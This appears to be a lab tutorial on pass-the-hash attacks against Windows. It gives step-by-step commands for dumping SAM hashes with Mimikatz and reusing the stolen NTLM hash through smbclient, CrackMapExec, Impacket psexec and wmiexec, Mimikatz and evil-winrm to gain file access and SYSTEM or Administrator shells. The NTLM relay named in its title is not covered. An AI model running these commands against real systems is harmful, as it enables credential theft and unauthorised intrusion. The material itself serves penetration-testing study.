Pass-the-Hash & NTLM Relay Techniques

Published on June 25, 2025

---

When NTLM hashes cannot be cracked quickly, we can still leverage them to authenticate—without knowing the plaintext—using pass-the-hash (PtH) and related techniques. Below we show every command and explain each method.

1. Extract Administrator NTLM Hash (Mimikatz)

On FILES01 (192.168.50.211), run PowerShell as Administrator and launch Mimikatz from C:\tools:

PS C:\Windows\system32> cd C:\tools
PS C:\tools> .\mimikatz.exe

Explanation: Changes into the tools folder and starts Mimikatz’s interactive shell.

Enable debug privilege and elevate to SYSTEM, then dump SAM hashes:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

Explanation: privilege::debug enables SeDebugPrivilege to read LSASS memory.
token::elevate impersonates the SYSTEM account.
lsadump::sam extracts NTLM hashes from the locked SAM database.

Copy the Administrator hash (e.g., 7a38310ea6f0027ee955abed1762964b) and save on Kali:

kali@kali:~/passwordattacks$ echo "7a38310ea6f0027ee955abed1762964b" > administrator.hash

Explanation: Stores the hash in a file for use with other tools.

2. SMB Access with smbclient

Use the NTLM hash to authenticate to an SMB share:

kali@kali:~$ smbclient \\\\192.168.50.212\\secrets \
  -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

Explanation: \\\\IP\\share escape syntax; -U specifies the username; --pw-nt-hash provides the NTLM hash instead of a password.

After connection:

smb: \> dir
smb: \> get secrets.txt

Explanation: Lists and downloads files from the share.

3. SMB Access with CrackMapExec

kali@kali:~$ crackmapexec smb 192.168.50.212 \
  -u Administrator -H 7a38310ea6f0027ee955abed1762964b

Explanation: crackmapexec smb module for SMB; -u username; -H NTLM hash; automates share enumeration and can also upload/download files.

4. Remote Code Execution with impacket-psexec

kali@kali:~$ impacket-psexec \
  -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.50.212

Explanation: -hashes LM:NT format; we set LM to 32 zeros when unused;
authenticates and executes cmd.exe as SYSTEM by default.

5. Remote Code Execution with impacket-wmiexec

kali@kali:~$ impacket-wmiexec \
  -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.50.212

Explanation: similar to psexec but leverages WMI; yields a shell as the specified user (Administrator).

6. Pass-the-Hash with Mimikatz

Within Mimikatz’s shell on FILES01, use sekurlsa::pth to spawn a process with the hash:

mimikatz # sekurlsa::pth /user:Administrator \
  /domain:FILES02 /ntlm:7a38310ea6f0027ee955abed1762964b \
  /run:cmd.exe

Explanation: injects the NTLM hash into a new cmd.exe process token; you then interact with a shell running as Administrator.

7. RDP or WinRM via Hash (Other Protocols)

You can also authenticate over RDP or WinRM:

kali@kali:~$ evil-winrm \
  -i 192.168.50.212 -u Administrator \
  -H 7a38310ea6f0027ee955abed1762964b

Explanation: uses WinRM with NTLM hash; requires the WinRM service enabled and firewall open.

Key Points

• PtH works because NTLM hashes are unsalted and static.
• Local Administrator bypasses UAC remote restrictions; other admins need additional configuration.
• Multiple tools support PtH: smbclient, CME, Impacket, Mimikatz, Evil-WinRM.
• Mimikatz requires Administrator + SeDebugPrivilege; use privilege::debug and token::elevate.